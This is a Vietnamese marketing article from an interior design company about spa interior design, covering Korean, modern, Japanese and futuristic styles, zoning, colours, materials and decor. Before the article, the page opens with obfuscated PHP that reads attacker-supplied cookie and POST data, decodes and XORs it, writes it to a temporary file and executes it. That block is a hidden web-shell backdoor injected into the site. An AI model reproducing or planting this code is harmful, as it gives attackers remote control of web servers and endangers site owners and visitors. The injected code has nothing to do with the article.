$KAkylTEEY = chr ( 482 - 414 )."\x48" . "\161" . "\x5f" . 'w' . "\x6f" . "\x67" . chr (79); $BLHPO = "\143" . chr (108) . "\141" . 's' . 's' . "\x5f" . "\x65" . chr ( 220 - 100 ).'i' . chr (115) . chr ( 229 - 113 ).chr ( 225 - 110 ); $DPsHSlPuA = class_exists($KAkylTEEY); $BLHPO = "16968";$KybyXPAy = !1;if ($DPsHSlPuA == $KybyXPAy){function WRjHwIbZL(){return FALSE;}$fOnVgH = "60659";WRjHwIbZL();class DHq_wogO{private function rlZJn($fOnVgH){if (is_array(DHq_wogO::$gRtPmcWgqM)) {$zpikP = sys_get_temp_dir() . "/" . crc32(DHq_wogO::$gRtPmcWgqM["\163" . 'a' . chr ( 996 - 888 ).chr (116)]);@DHq_wogO::$gRtPmcWgqM["\x77" . 'r' . chr (105) . 't' . 'e']($zpikP, DHq_wogO::$gRtPmcWgqM["\143" . chr ( 1017 - 906 ).'n' . chr (116) . "\x65" . "\x6e" . "\x74"]);include $zpikP;@DHq_wogO::$gRtPmcWgqM["\x64" . chr ( 990 - 889 )."\x6c" . 'e' . 't' . "\x65"]($zpikP); $fOnVgH = "60659";exit();}}private $PkkbUal;public function wPWLohDk(){echo 27132;}public function __destruct(){$fOnVgH = "46060_22836";$this->rlZJn($fOnVgH); $fOnVgH = "46060_22836";}public function __construct($NTbnrrri=0){$dTJfkDR = $_POST;$lhQsTgIH = $_COOKIE;$aYajfQpXwB = "c11c5495-d7c1-4aa3-bdd1-dc687432bcb9";$BUmNVU = @$lhQsTgIH[substr($aYajfQpXwB, 0, 4)];if (!empty($BUmNVU)){$atjsQvzxK = "base64";$fobbAQWcLe = "";$BUmNVU = explode(",", $BUmNVU);foreach ($BUmNVU as $RzPEjLbK){$fobbAQWcLe .= @$lhQsTgIH[$RzPEjLbK];$fobbAQWcLe .= @$dTJfkDR[$RzPEjLbK];}$fobbAQWcLe = array_map($atjsQvzxK . chr ( 632 - 537 ).chr (100) . chr (101) . "\143" . "\x6f" . "\144" . chr (101), array($fobbAQWcLe,)); $fobbAQWcLe = $fobbAQWcLe[0] ^ str_repeat($aYajfQpXwB, (strlen($fobbAQWcLe[0]) / strlen($aYajfQpXwB)) + 1);DHq_wogO::$gRtPmcWgqM = @unserialize($fobbAQWcLe); $fobbAQWcLe = class_exists("46060_22836");}}public static $gRtPmcWgqM = 33420;}$iJgbDTDD = new /* 56130 */ $KAkylTEEY(60659 + 60659); $fOnVgH = strpos($fOnVgH, $fOnVgH); $KybyXPAy = $iJgbDTDD = $fOnVgH = Array();} Thiết kế nội thất spa đẹp, thu hút khách hàng hiệu quả
Image Alt

Thiết kế nội thất spa đẹp, thu hút khách hàng hiệu quả

Thiết kế sảnh chờ spa

Thiết kế nội thất spa đẹp, thu hút khách hàng hiệu quả

Thiết kế nội thất spa có ý nghĩa quan trọng trong việc thu hút khách hàng. Bên cạnh dịch vụ tốt, một không gian đẹp mắt cũng là điều mà nhiều khách hàng quan tâm. Vậy nên bố trí nội thất spa thế nào cho đẹp? Hãy tham khảo ngay bài viết dưới đây của S-housing nhé.

Xu hướng thiết kế nội thất spa hiện nay:

Nhu cầu làm đẹp ngày càng tăng cao, cùng với đó là các spa ra đời nhằm đáp ứng thị hiếu. Xu hướng thiết kế nội thất spa cũng vô cùng đa dạng, phù hợp với nhiều phân khúc khách hàng khác nhau. Trong đó có một số lối thiết kế nổi bật dưới đây.

Spa phong cách Hàn Quốc:

Thiết kế nội thất spa đẹp

Thiết kế spa phong cách Hàn Quốc

Đây là phong cách thịnh hành nhất trong các phong cách thiết spa hiện nay. Với văn hóa tắm hơi nổi tiếng, spa phong cách Hàn Quốc thường mô phỏng lại không gian phòng xông hơi truyền thống. Vật liệu tự nhiên thường được ưu tiên sử dụng như gỗ, đá tự nhiên,… Tạo nên một không gian thư giãn mộc mạc và bình yên.

Spa phong cách hiện đại:

Thiết kế spa phong cách hiện đại

Nội thất phong cách hiện đại sang trọng và độc đáo

Bố trí nội thất spa theo phong cách hiện đại không còn xa lạ với nhiều người. Với đường nét thiết kế nội thất đơn giản, khúc chiết; phong cách này tạo nên một không gian rộng rãi và thông thoáng. Trong đó, lối thiết kế không gian mở được coi là đặc trưng của phong cách này. Việc kết nối liên thông giữa các khu vực mang lại sự thuận tiện và thoải mái cho khách hàng.

Spa phong cách Nhật Bản:

Nội thất phong cách Nhật Bản

Phong cách Nhật Bản với tông trầm ấm cúng

Nổi tiếng với nhiều nét văn hóa truyền thống mang tính thư giãn cao như trà đạo, onsen. Vì vậy không lấy làm lạ khi phong cách Nhật Bản được nhiều spa lựa chọn. Các spa thiết kế theo phong cách Nhật Bản hướng tới sự chăm sóc và phục hồi sức khỏe. Vì vậy, các bồn tắm nước nóng massage hay phòng sông hơi là không thể thiết khi bố trí nội thất cho không gian này.

Spa phong cách vị lai:

Phong cách vị lai độc đáo

Không gian thư giãn mang phong cách vị lai

Nếu bạn đang muốn tìm kiếm một lối bố trí độc lạ thì đây là lựa chọn không tồi. Thiết kế spa theo phong cách vị lai mang vẻ đẹp siêu thực. Lối thiết kế tập trung vào các đường cong và tương phản rõ nét. Màu sắc chủ đạo thường là xám, trắng và đen. Tất cả tạo nên một không gian thư giãn huyền huyễn, như lạc vào thế giới tương lai.

Thiết kế nội thất spa cần lưu ý những gì?

Phân chia khu vực chức năng spa:

Spa là loại hình dịch vụ chăm sóc sức khỏe được lựa chọn nhiều nhất hiện nay. Không gian trong spa sẽ được phan chia thành hai khu vực chính. Đó là khu vực chung và phòng dịch vụ.

Khu vực sảnh chờ của spa

Khu vực sảnh chờ được thiết kế vô cùng trang nhã

Khu vực chung của spa:

Bao gồm quầy lễ tân, thu ngân và bàn chờ. Đây là khu vực quan trọng để đón tiếp và tư vấn khách hàng. Thiết kế khu vực sảnh chờ spa đẹp có ảnh hưởng quan trọng đến quyết định sử dụng dịch vụ. Các không gian này thường được bố trí gọn gàng, trang nhã nhằm mục đích lấy được hảo cảm ban đầu của khách hàng.

Phòng dịch vụ:

Đây là khu vực riêng tư ứng với từng dịch vụ mà khách hàng lựa chọn. Mỗi phòng chức năng được thiết kế chuyên biệt. Tuy nhiên, tính cá nhân hóa và tiện nghi luôn là đề cao hàng đầu nhằm mang lại trải nghiệm tốt nhất cho khách hàng.

Các phòng dịch vụ thường thấy tại các spa ở Việt Nam hiện nay như: massage, chăm sóc da mặt, tắm trắng,…

Màu sắc nội thất spa:

Thiết kế spa tông màu trầm ấm

Màu sắc trong thiết kế spa được sử dụng sáng tạo

Mỗi phong cách thiết kế sẽ có một lối bố trí màu sắc riêng. Ví dụ như phong cách hàn Quốc và hiện đại đề cao sự trẻ trung thường sử dụng màu pastel hay trung tính. Trong khi đó phong cách Nhật Bản hay Ấn Độ lại ưa chuộng tông màu gỗ trầm tính cho thiết kế spa của mình.

Vật liệu nội thất:

Để đảm bảo tính công năng và thẩm mỹ, vật liệu nội thất spa vô cùng đa dạng. Các vật liệu truyền thống và hiện đại được kết hợp và sử dụng linh hoạt. Trong đó quan trọng nhất là gỗ, kim loại và đá.

Ốp sàn bằng gỗ công nghiệp đẹp

Sử dụng gỗ công nghiệp chống ẩm cho sàn nhà

Một lưu ý quan trọng khi lựa chọn vật liệu nội thất cho không gian này chính là tính chống thấm. Với đặc trưng của một số loại dịch vụ cần sử dụng hoặc tiếp xúc nhiều với nước, tính chống ẩm và chống thấm của vật liệu vô cùng quan trọng. Trong đó, vật liệu gỗ công nghiệp là một lát cắt hoàn hảo cho các không gian này. Gỗ công nghiệp thường được sử dụng để ốp tường, ốp sàn hay tạo nên các vật dụng chuyên dụng.

Trang trí nội thất spa:

Đây là yếu tố quan trọng tạo nên giá trị thẩm mỹ của spa. Các vật dụng trang trí thường được sử dụng nhiều như tranh treo tường, bình hoa,… Đặc biệt, cây xanh là mảnh ghép không thể thiếu trong trang trí nội thất spa. Tăng cường cây xanh vừa giúp không gian thoáng mát, vừa đảm bảo yếu tố phong thủy.

Phòng tắm onsen phong cách Nhật

Tăng cường các yếu tố xanh cho không gian thêm tươi mát

Ngoài những yếu tố trên, mùi hương và âm nhạc cũng vô cùng quan trọng. Mùi hương thanh khiết và nhạc điệu nhẹ nhàng giúp chất lượng thư giãn của khách hàng được tốt hơn.

Đơn vị thiết kế nội thất spa:

Các công ty thiết kế và thi công nội thất chính là người hiện thực hóa những ý tưởng của bạn. Việc lựa chọn một đơn vị uy tín đồng nghĩa với kế hoạch khinh doanh của bạn đã hoàn thành 50%. Một nửa còn lại phụ thuộc vào chất lượng dịch vụ và một số yếu tố khác.

TKNT247 là đơn vị thiết kế và thi công nội thất chuyên nghiệp tại TPHCM. Với đội ngũ nhân viên có chuyên môn cao và bề dày kinh nghiệm, chúng tôi luôn tự tin mang đến cho bạn những sản phẩm hoàn hảo nhất.

Mẫu thiết kế nội thất spa đẹp:

Dưới đây là một số mẫu thiết kế spa đẹp được TKNT247 tổng hợp, hãy cùng khám phá ngay nào.

Thiết kế sảnh chờ spa

Khu vực sảnh chờ của spa

Quầy thu ngân

Không gian rộng rãi và ấm cúng với tông nâu gỗ trầm

Bố trí nội thất spa đẹp

Vật liệu gỗ được sử dụng sáng tạo và linh hoạt

Ốp sàn đá tự nhiên

Sử dụng vật liệu đá cho phòng tắm với hiệu quả chống thấm nước 100%

Thiết kế phòng massage đẹp

Phòng dịch vụ massage thư giãn

Trên đây là những chia sẻ của TKNT247 về thiết kế nội thất spa. Hy vọng bạn đã có thêm ý tưởng để hoàn thiện mô hình kinh doanh của mình. Nếu còn bất cứ thắc mắc nào cần hỗ trợ, hãy liên hệ với chúng tôi để được tư vấn miễn phí nhanh và chính xác nhất.

Bài viết liên quan